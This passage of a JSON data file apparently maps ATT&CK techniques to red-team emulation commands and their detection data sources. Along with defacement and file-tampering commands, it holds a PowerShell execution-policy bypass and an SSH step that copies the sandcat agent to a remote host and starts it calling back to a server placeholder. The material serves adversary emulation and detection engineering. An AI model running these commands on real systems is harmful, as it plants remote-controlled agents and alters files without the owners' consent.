"collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null, + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1491", + "command_list": [ + "echo \"proof that this machine was hacked.\" > message.txt\n", + "Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'\n", + ".\\Invoke-MemeKatz.ps1\n", + "powershell.exe -ep bypass -c \"Invoke-MemeKatz.ps1\"\n" + ], + "commands": [ + { + "command": "echo \"proof that this machine was hacked.\" > message.txt\n", + "source": "data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml", + "name": "Create a text file for the user to find" + }, + { + "command": "Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'\n", + "source": "data/abilities/impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml", + "name": "Create a text file for the user to find" + }, + { + "command": ".\\Invoke-MemeKatz.ps1\n", + "source": "data/abilities/impact/68235976-2404-42a8-9105-68230cfef562.yml", + "name": "Downloads random meme and sets as desktop background" + }, + { + "command": "powershell.exe -ep bypass -c \"Invoke-MemeKatz.ps1\"\n", + "source": "data/abilities/impact/68235976-2404-42a8-9105-68230cfef562.yml", + "name": "Downloads random meme and sets as desktop background" + } + ], + "parsed_datasets": [ + { + "id": "47d08617-5ce1-424a-8cc5-c9c978ce6bf9", + "name": "Leave note", + "description": "Create a text file for the user to find", + "tactic": "impact", + "technique": { + "attack_id": "T1491", + "name": "Defacement" + }, + "platforms": { + "darwin": { + "sh": { + "command": "echo \"proof that this machine was hacked.\" > message.txt\n" + } + }, + "linux": { + "sh": { + "command": "echo \"proof that this machine was hacked.\" > message.txt\n" + } + }, + "windows": { + "psh": { + "command": "Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'\n" + } + } + } + }, + { + "id": "68235976-2404-42a8-9105-68230cfef562", + "name": "Invoke-MemeKatz", + "description": "Downloads random meme and sets as desktop background", + "tactic": "impact", + "technique": { + "attack_id": "T1491", + "name": "Defacement" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": ".\\Invoke-MemeKatz.ps1\n", + "payloads": [ + "Invoke-MemeKatz.ps1" + ] + }, + "cmd": { + "command": "powershell.exe -ep bypass -c \"Invoke-MemeKatz.ps1\"\n", + "payloads": [ + "Invoke-MemeKatz.ps1" + ] + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1565.001", + "command_list": [ + "./mission.go -duration 60 -extension .caldera -dir '/'", + "copy mission.go mission.exe &&mission.exe -duration 60 -extension .caldera -dir C:\\", + "mv mission.go mission.exe;.\\mission.exe -duration 60 -extension .caldera -dir 'C:\\';" + ], + "commands": [ + { + "command": "./mission.go -duration 60 -extension .caldera -dir '/'", + "source": "data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml", + "name": "Hunts for files of a certain extension and inserts a message" + }, + { + "command": "copy mission.go mission.exe &&mission.exe -duration 60 -extension .caldera -dir C:\\", + "source": "data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml", + "name": "Hunts for files of a certain extension and inserts a message" + }, + { + "command": "mv mission.go mission.exe;.\\mission.exe -duration 60 -extension .caldera -dir 'C:\\';", + "source": "data/abilities/impact/55f9600a-756f-496b-b27f-682052dc429c.yml", + "name": "Hunts for files of a certain extension and inserts a message" + } + ], + "parsed_datasets": [ + { + "description": "Hunts for files of a certain extension and inserts a message", + "id": "55f9600a-756f-496b-b27f-682052dc429c", + "name": "File Hunter Mission", + "platforms": { + "darwin": { + "sh": { + "command": "./mission.go -duration 60 -extension .caldera -dir '/'", + "payloads": [ + "mission.go" + ] + } + }, + "linux": { + "sh": { + "command": "./mission.go -duration 60 -extension .caldera -dir '/'", + "payloads": [ + "mission.go" + ] + } + }, + "windows": { + "cmd": { + "command": "copy mission.go mission.exe &&mission.exe -duration 60 -extension .caldera -dir C:\\", + "payloads": [ + "mission.go" + ] + }, + "psh": { + "command": "mv mission.go mission.exe;.\\mission.exe -duration 60 -extension .caldera -dir 'C:\\';", + "payloads": [ + "mission.go" + ] + } + } + }, + "tactic": "impact", + "technique": { + "attack_id": "T1565.001", + "name": "Data Manipulation: Stored Data Manipulation" + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1021.004", + "command_list": [ + "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n", + "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n" + ], + "commands": [ + { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n", + "source": "data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml", + "name": "Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication" + }, + { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n", + "source": "data/abilities/lateral-movement/10a9d979-e342-418a-a9b0-002c483e0fa6.yml", + "name": "Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication" + } + ], + "parsed_datasets": [ + { + "id": "10a9d979-e342-418a-a9b0-002c483e0fa6", + "name": "Start 54ndc47", + "description": "Copy 54ndc47 to remote host and start it, assumes target uses SSH keys and passwordless authentication", + "tactic": "lateral-movement", + "technique": { + "attack_id": "T1021.004", + "name": "Remote Services: SSH" + }, + "platforms": { + "darwin": { + "sh": { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n", + "cleanup": "ssh -o ConnectTimeout=3 #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'\n", + "payloads": [ + "sandcat.go-darwin" + ] + } + }, + "linux": { + "sh": { + "command": "scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-linux #{remote.ssh.cmd}:~/sandcat.go &&\nssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'\n", + "cleanup": "ssh -o ConnectTimeout=3 -o StrictHostKeyChecking=no #{remote.ssh.cmd} 'pkill -f sandcat & rm -f ~/sandcat.go'\n", + "payloads": [ + "sandcat.go-linux" + ] + } + } + }, + "singleton": true + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": 